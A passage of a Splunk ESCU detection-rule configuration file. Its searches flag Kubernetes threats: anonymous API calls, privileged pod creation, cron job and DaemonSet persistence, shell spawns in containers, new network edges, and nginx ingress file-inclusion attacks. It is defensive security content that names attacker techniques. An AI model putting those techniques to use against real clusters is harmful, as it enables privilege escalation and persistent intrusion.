key='source.workload.name' + ":" + 'dest.workload.name' | join type=left key [ mstats avg(tcp.*) as avg_tcp.* avg(udp.*) as avg_udp.* stdev(tcp.*) as stdev_tcp.* avg(udp.*) as stdev_udp.* where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name dest.workload.name | eval key='source.workload.name' + ":" + 'dest.workload.name' ] | eval anomalies = "" | foreach stdev_* [ eval anomalies =if( '<>' > ('avg_<>' + 3 * 'stdev_<>'), anomalies + "<> higher than average by " + tostring(round(('<>' - 'avg_<>')/'stdev_<>' ,2)) + " Standard Deviations. <>=" + tostring('<>') + " avg_<>=" + tostring('avg_<>') + " 'stdev_<>'=" + tostring('stdev_<>') + ", " , anomalies) ] | fillnull | eval anomalies = split(replace(anomalies, ",\s$$$$", "") ,", ") | where anomalies!="" | stats count(anomalies) as count values(anomalies) as anomalies by k8s.cluster.name source.workload.name dest.workload.name | rename service as k8s.service | where count > 5 | rename k8s.cluster.name as host | `kubernetes_anomalous_traffic_on_network_edge_filter` [ESCU - Kubernetes AWS detect suspicious kubectl calls - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects anonymous and unauthenticated requests to a Kubernetes cluster. It identifies this behavior by monitoring for API calls from users who have not provided any token or password in their request. This is a significant behavior to identify for a SOC as it indicates a severe misconfiguration that allows unfettered access to a cluster with no traceability to a user or service. The impact of such an attack could be substantial, potentially granting an attacker access to sensitive data or control over the cluster. This detection rule is crucial for maintaining the security and integrity of your Kubernetes infrastructure. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects anonymous and unauthenticated requests to a Kubernetes cluster. It identifies this behavior by monitoring for API calls from users who have not provided any token or password in their request. This is a significant behavior to identify for a SOC as it indicates a severe misconfiguration that allows unfettered access to a cluster with no traceability to a user or service. The impact of such an attack could be substantial, potentially granting an attacker access to sensitive data or control over the cluster. This detection rule is crucial for maintaining the security and integrity of your Kubernetes infrastructure. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs. action.escu.known_false_positives = Kubectl calls are not malicious by nature. However source IP, verb and Object can reveal potential malicious activity, specially anonymous suspicious IPs and sensitive objects such as configmaps or secrets action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect suspicious kubectl calls - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes AWS detect suspicious kubectl calls - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` user.username="system:anonymous" user.groups{} IN ("system:unauthenticated") | fillnull | stats count by objectRef.name objectRef.namespace objectRef.resource requestReceivedTimestamp requestURI responseStatus.code sourceIPs{} stage user.groups{} user.uid user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user |`kubernetes_aws_detect_suspicious_kubectl_calls_filter` [ESCU - Kubernetes Create or Update Privileged Pod - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of privileged pods in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation of pods with root privileges. This behavior is worth identifying for a SOC as it could potentially allow an attacker to escalate privileges, exploit the kernel, and gain full access to the host's namespace and devices. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of privileged pods in Kubernetes. It identifies this behavior by monitoring Kubernetes Audit logs for the creation of pods with root privileges. This behavior is worth identifying for a SOC as it could potentially allow an attacker to escalate privileges, exploit the kernel, and gain full access to the host's namespace and devices. The impact of such an attack could be severe, leading to unauthorized access to sensitive information, data breaches, and service disruptions. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-14 action.escu.modification_date = 2023-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Create or Update Privileged Pod - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes privileged pod created by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Create or Update Privileged Pod - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` objectRef.resource=pods verb=create OR verb=update requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration=*\"privileged\":true* | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind responseStatus.code sourceIPs{} stage user.username userAgent verb requestObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_create_or_update_privileged_pod_filter` [ESCU - Kubernetes Cron Job Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a Kubernetes cron job, a task scheduled to run automatically at specified intervals. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a cron job. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute malicious tasks repeatedly and automatically, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of a Kubernetes cron job, a task scheduled to run automatically at specified intervals. It identifies this behavior by monitoring Kubernetes Audit logs for creation of a cron job. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute malicious tasks repeatedly and automatically, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-14 action.escu.modification_date = 2023-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Cron Job Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = Kubernetes cron job creation from user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Cron Job Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` verb=create "objectRef.resource"=cronjobs | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind requestObject.spec.schedule requestObject.spec.jobTemplate.spec.template.spec.containers{}.image responseStatus.code sourceIPs{} stage user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_cron_job_creation_filter` [ESCU - Kubernetes DaemonSet Deployed - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a DaemonSet in a Kubernetes cluster. A DaemonSet ensures the presence of a specific pod on every node in the cluster, making it an ideal avenue for persistent access. This behavior is identified by monitoring Kubernetes Audit logs for the creation of a DaemonSet. The identified behavior is worth noting for a SOC as it could potentially allow an attacker to maintain persistent access to the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of a DaemonSet in a Kubernetes cluster. A DaemonSet ensures the presence of a specific pod on every node in the cluster, making it an ideal avenue for persistent access. This behavior is identified by monitoring Kubernetes Audit logs for the creation of a DaemonSet. The identified behavior is worth noting for a SOC as it could potentially allow an attacker to maintain persistent access to the Kubernetes infrastructure. The impact of such an attack could be severe, leading to persistent attacks, service disruptions, or unauthorized access to sensitive information. action.escu.how_to_implement = The detection is based on data that originates from Kubernetes Audit logs. Ensure that audit logging is enabled in your Kubernetes cluster. Kubernetes audit logs provide a record of the requests made to the Kubernetes API server, which is crucial for monitoring and detecting suspicious activities. Configure the audit policy in Kubernetes to determine what kind of activities are logged. This is done by creating an Audit Policy and providing it to the API server. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. This doc will describe how to collect the audit log file https://github.com/signalfx/splunk-otel-collector-chart/blob/main/docs/migration-from-sck.md. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-14 action.escu.modification_date = 2023-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes DaemonSet Deployed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = DaemonSet deployed to Kubernetes by user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes DaemonSet Deployed - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_audit` "objectRef.resource"=daemonsets verb=create | fillnull | stats count values(user.groups{}) as user_groups by kind objectRef.name objectRef.namespace objectRef.resource requestObject.kind responseStatus.code sourceIPs{} stage user.username userAgent verb | rename sourceIPs{} as src_ip, user.username as user | `kubernetes_daemonset_deployed_filter` [ESCU - Kubernetes Falco Shell Spawned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects instances where a shell is spawned within a Kubernetes container, a behavior often indicative of an attacker gaining unauthorized access. Leveraging Falco, a cloud-native runtime security tool, this analytic monitors system calls within the Kubernetes environment, flagging when a shell is spawned in a container. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute arbitrary commands, manipulate container processes, or escalate privileges, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects instances where a shell is spawned within a Kubernetes container, a behavior often indicative of an attacker gaining unauthorized access. Leveraging Falco, a cloud-native runtime security tool, this analytic monitors system calls within the Kubernetes environment, flagging when a shell is spawned in a container. This behavior is worth identifying for a SOC as it could potentially allow an attacker to execute arbitrary commands, manipulate container processes, or escalate privileges, posing a significant threat to the integrity and security of the Kubernetes infrastructure. The impact of such an attack could be severe, leading to data breaches, service disruptions, or unauthorized access to sensitive information. action.escu.how_to_implement = The detection is based on data that originates from Falco, a cloud native runtime security tool. Falco is designed to detect anomalous activity in your applications and is a crucial component of this detection rule. To implement this detection rule, you need to install and configure Falco in your Kubernetes environment. Once Falco is set up, it will monitor the system calls in your Kubernetes infrastructure and generate logs for any suspicious activity. These logs are then ingested by Splunk for analysis. Use the Splunk OpenTelemetry Collector for Kubernetes to collect the logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-12-13 action.escu.modification_date = 2023-12-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Falco Shell Spawned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Security"] action.risk = 1 action.risk.param._risk_message = A shell is spawned in the container $container_name$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Falco Shell Spawned - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Security"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kube_container_falco` "A shell was spawned in a container" | fillnull | stats count by container_image container_image_tag container_name parent proc_exepath process user | `kubernetes_falco_shell_spawned_filter` [ESCU - Kubernetes newly seen TCP edge - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects TCP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a kubernetes cluster. This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour, with those over the last 30 days in order to detect newly seen inter workload communication. Newly seen network connections in a microservices based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the applications ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the applications integrity, availability, and confidentiality at risk. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects TCP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a kubernetes cluster. This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour, with those over the last 30 days in order to detect newly seen inter workload communication. Newly seen network connections in a microservices based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the applications ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the applications integrity, availability, and confidentiality at risk. action.escu.how_to_implement = To gather NPM metrics the Open Telemetry to the Kubernetes Cluster and enable Network Performance Monitoring according to instructions found in Splunk Docs https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly set up the add-on to ingest metrics from O11y cloud using the following settings, and any other settings left at default:\ * Name sim_npm_metrics_to_metrics_index \ * Org ID \ * Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \ * Metric Resolution 10000 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-10 action.escu.modification_date = 2024-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes newly seen TCP edge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes newly seen TCP edge in kubernetes cluster $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes newly seen TCP edge - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(tcp.packets) as tcp.packets_count where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name dest.workload.name | eval current="True" | append [ mstats count(tcp.packets) as tcp.packets_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name dest.workload.name | eval current="false" ] | eventstats values(current) as current by source.workload.name dest.workload.name | search current="true" current!="false" | rename k8s.cluster.name as host | `kubernetes_newly_seen_tcp_edge_filter` [ESCU - Kubernetes newly seen UDP edge - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic detects UDP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a kubernetes cluster. This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour, with those over the last 30 days in order to detect newly seen inter workload communication. Newly seen network connections in a microservices based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the applications ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the applications integrity, availability, and confidentiality at risk. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects UDP communication between a newly seen source and destination workload pair. This is done to identify changes in network behavior between workloads in a kubernetes cluster. This detection leverages Network performance Monitoring metrics harvested using an OTEL collector, and is pulled from Splunk Observability cloud using the Splunk Infrastructure Monitoring Add-on. (https://splunkbase.splunk.com/app/5247). This detection compares network activity between workloads over the last 1 hour, with those over the last 30 days in order to detect newly seen inter workload communication. Newly seen network connections in a microservices based app indicate a change in behavior which could indicate potential security threats or anomalies. Distributed applications typically have common established network connection topologies, and new connections are often either an indication of a change in the application or an active threat. Unauthorized connections may enable the attacker to infiltrate the applications ecosystem, potentially leading to data breaches, manipulation of sensitive information, or disruption of critical services. Bad actors may exploit these connections to gain access, escalate privileges, move laterally within the microservices, or introduce malicious code or payloads, putting the applications integrity, availability, and confidentiality at risk. action.escu.how_to_implement = To gather NPM metrics the Open Telemetry to the Kubernetes Cluster and enable Network Performance Monitoring according to instructions found in Splunk Docs https://docs.splunk.com/observability/en/infrastructure/network-explorer/network-explorer-setup.html#network-explorer-setup In order to access those metrics from within Splunk Enterprise and ES, the Splunk Infrastructure Monitoring add-on must be installed and configured on a Splunk Search Head. Once installed, first configure the add-on with your O11y Cloud Org ID and Access Token. Lastly set up the add-on to ingest metrics from O11y cloud using the following settings, and any other settings left at default:\ * Name sim_npm_metrics_to_metrics_index \ * Org ID \ * Signal Flow Program data('tcp.packets').publish(label='A'); data('tcp.bytes').publish(label='B'); data('tcp.new_sockets').publish(label='C'); data('udp.packets').publish(label='D'); data('udp.bytes').publish(label='E') \ * Metric Resolution 10000 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-10 action.escu.modification_date = 2024-01-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes newly seen UDP edge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"] action.risk = 1 action.risk.param._risk_message = Kubernetes newly seen UDP edge in kubernetes cluster $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Kubernetes newly seen UDP edge - Rule action.correlationsearch.annotations = {"analytic_story": ["Abnormal Kubernetes Behavior using Splunk Infrastructure Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | mstats count(udp.packets) as udp.packets_count where `kubernetes_metrics` AND earliest=-1h by k8s.cluster.name source.workload.name dest.workload.name | eval current="True" | append [ mstats count(udp.packets) as udp.packets_count where `kubernetes_metrics` AND earliest=-30d latest=-1h by source.workload.name dest.workload.name | eval current="false" ] | eventstats values(current) as current by source.workload.name dest.workload.name | search current="true" current!="false" | rename k8s.cluster.name as host | `kubernetes_newly_seen_udp_edge_filter` [ESCU - Kubernetes Nginx Ingress LFI - Rule] action.escu = 0 action.escu.enabled = 1 description = This search uses the Kubernetes logs from a nginx ingress controller to detect local file inclusion attacks. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search uses the Kubernetes logs from a nginx ingress controller to detect local file inclusion attacks. action.escu.how_to_implement = You must ingest Kubernetes logs through Splunk Connect for Kubernetes. action.escu.known_false_positives = unknown action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Nginx Ingress LFI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Local File Inclusion Attack detected on $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Nginx Ingress LFI - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search uses the Kubernetes logs from a nginx ingress controller to detect local file inclusion attacks. action.notable.param.rule_title = Kubernetes Nginx Ingress LFI action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_container_controller` | rex field=_raw "^(?\S+)\s+-\s+-\s+\[(?[^\]]*)\]\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\"(?[^\"]*)\"\s\"(?[^\"]*)\"\s(?\S*)\s(?\S*)\s\[(?[^\]]*)\]\s\[(?[^\]]*)\]\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)\s(?\S*)" | lookup local_file_inclusion_paths local_file_inclusion_paths AS request OUTPUT lfi_path | search lfi_path=yes | rename remote_addr AS src_ip, upstream_status as status, proxy_upstream_name as proxy | rex field=request "^(?\S+)\s(?\S+)\s" | eval phase="operate" | eval severity="high" | stats count min(_time) as firstTime max(_time) as lastTime by src_ip, status, url, http_method, host, http_user_agent, proxy, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kubernetes_nginx_ingress_lfi_filter` [ESCU - Kubernetes Nginx Ingress RFI - Rule] action.escu = 0 action.escu.enabled = 1 description = This search uses the Kubernetes logs from a nginx ingress controller to detect remote file inclusion attacks. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1212"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search uses the Kubernetes logs from a nginx ingress controller to detect remote file inclusion attacks. action.escu.how_to_implement = You must ingest Kubernetes logs through Splunk Connect for Kubernetes. action.escu.known_false_positives = unknown action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Nginx Ingress RFI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = Remote File Inclusion Attack detected on $host$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kubernetes Nginx Ingress RFI - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": 